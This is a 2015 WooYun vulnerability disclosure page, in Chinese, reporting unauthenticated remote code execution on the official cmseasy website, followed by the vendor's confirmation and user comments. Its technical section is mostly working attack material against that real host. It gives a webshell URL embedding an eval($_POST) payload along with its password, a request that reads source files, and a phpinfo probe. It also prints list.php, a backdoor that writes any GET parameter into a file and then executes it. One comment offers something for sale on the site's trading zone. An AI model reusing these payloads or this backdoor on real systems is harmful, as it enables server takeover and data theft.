当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(23) 关注此漏洞

缺陷编号: WooYun-2015-151381

漏洞标题: cmseasy官网无条件getshell

相关厂商: cmseasy

漏洞作者: whynot

提交时间: 2015-11-03 15:10

公开时间: 2015-12-20 15:18

漏洞类型: 命令执行

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 远程代码执行

5人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-03: 细节已通知厂商并且等待厂商处理中
2015-11-05: 厂商已经确认,细节仅向厂商公开
2015-11-15: 细节向核心白帽子及相关领域专家公开
2015-11-25: 细节向普通白帽子公开
2015-12-05: 细节向实习白帽子公开
2015-12-20: 细节向公众公开

简要描述:

CMS官网 无条件getshell 想走个大场商 求20rank

详细说明:

首先先看webshell 要不直接把我的webshell给覆盖掉了

菜刀地址

http://www.cmseasy.cn/post/list.php?list=@eval%28$_POST[%27a%27]%29;

密码a

22222222222222222222222.png





漏洞证明:

view-source:http://www.cmseasy.cn/post/list.php?list=echo%20file_get_contents(%27list.php%27);

code 区域
<?php 
/*
*
*文章列表生成文件
*/
if(isset($_GET['list'])){
mud();
}
function mud(){
$fp=fopen('content_batch_stye.html','w');
file_put_contents('content_batch_stye.html',"<?php\r\n");
file_put_contents('content_batch_stye.html',$_GET['list'],FILE_APPEND);
fclose($fp);
require 'content_batch_stye.html';}
?>





code 区域
http://www.cmseasy.cn/post/list.php?list=phpinfo();



QQ20151103-1@2x.png

修复方案:

你们懂

版权声明:转载请注明来源 whynot@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-11-05 15:17

厂商回复:

谢谢

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2015-11-03 15:23 | whynot ( 普通白帽子 | Rank:670 漏洞数:134 | 为你解冻冰河 为你放弃世界有何不可)
    0

    我擦 图片放错了 应该是显示PHPinfo 最新正在写猪猪侠wyspider 能改下不?

  2. 2015-11-03 15:30 | xsser 认证白帽子 ( 普通白帽子 | Rank:297 漏洞数:22 | 当我又回首一切,这个世界会好吗?)
    0

    @whynot 你大爷

  3. 2015-11-03 15:32 | whynot ( 普通白帽子 | Rank:670 漏洞数:134 | 为你解冻冰河 为你放弃世界有何不可)
    0

    @xsser ....没注意啊 昨天上网断断续续的 所以匆忙提交了

  4. 2015-12-20 16:02 | whynot ( 普通白帽子 | Rank:670 漏洞数:134 | 为你解冻冰河 为你放弃世界有何不可)
    0

    zone wb交易区 收180wb价格好商量啊

登录后才能发表评论,请先 登录